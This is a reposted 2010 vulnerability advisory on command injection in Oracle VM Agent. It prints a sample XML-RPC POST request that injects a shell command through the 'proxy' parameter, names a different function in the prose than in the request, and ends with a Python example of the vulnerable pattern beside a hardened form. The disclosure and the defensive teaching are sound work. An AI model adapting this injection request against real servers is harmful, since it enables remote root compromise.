0day.today - Biggest Exploit Database in the World.
Oracle Virtual Server Agent Command Injection
=============================================
Oracle Virtual Server Agent Command Injection
=============================================

1. Advisory Information

Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release

2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. Software Description

Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server. By default, Oracle VM Agent runs as a highly privileged user, typically root.

4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

5. Vulnerable packages

We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM Agent 2.3.

6. Non-vulnerable packages

Patch set 2.2.1 and above

7. Credits

This vulnerability was discovered by Nahuel Grisolia ( nahuel -at- bonsai-sec.com ).

8. Technical Description

8.1. OS Command Injection

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input. Oracle VS Agent exposes several functions through XML-RPC.

One of these functions is validate_master_ip, which receives four parameters. The second parameter, "proxy", is vulnerable to command injection because it is not properly sanitized and its content is concatenated into an operating system command, which is executed as a highly privileged user (typically root).

The following POST message can be sent to the VM Agent XML-RPC port. By doing this, the ping command is executed as follows:

POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping -c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>

9. Report Timeline

2010-09-24 / Bonsai provides vulnerability information to ORACLE
2010-09-29 / Oracle confirms the vulnerability
2010-10-12 / Oracle published Critical Patch Update Fix
2010-10-13 / Public Disclosure

# 0day.today [2024-09-28] #
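The pattern described in section 8.1, shown next to a hardened form. This is an added example, not code from Oracle VM Agent or from the advisory: the curl command line, the function names and the rule that "proxy" must be an IP literal are assumptions chosen to match the sample request. Nothing is executed; the shell string is only tokenized to show how many commands a shell would see.

```python
import ipaddress
import shlex

# Constructed input modelled on the second <param> of the request above.
SAMPLE_PROXY = "192.168.1.103'; ping -c 10 localhost; '"
SAMPLE_URL = "http://192.168.1.101"


def build_command_unsafe(url, proxy):
    """Vulnerable pattern: parameters pasted into a string meant for a shell."""
    return "curl --proxy '%s' '%s'" % (proxy, url)


def shell_commands(cmdline):
    """Return the separate commands a POSIX shell would see in cmdline."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= set(";&|"):  # command separator
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_command_safe(url, proxy):
    """Hardened form: strict validation, then an argv list run without a shell."""
    host = str(ipaddress.ip_address(proxy))  # ValueError on anything but an IP
    # Pass this list to subprocess.run(argv) with shell=False (the default).
    return ["curl", "--proxy", host, "--", url]


if __name__ == "__main__":
    print(shell_commands(build_command_unsafe(SAMPLE_URL, SAMPLE_PROXY)))
    print(build_command_safe(SAMPLE_URL, "192.168.1.103"))
```

With the argv form, the quote and semicolon never reach a shell, and the validation step rejects the value before any process is started.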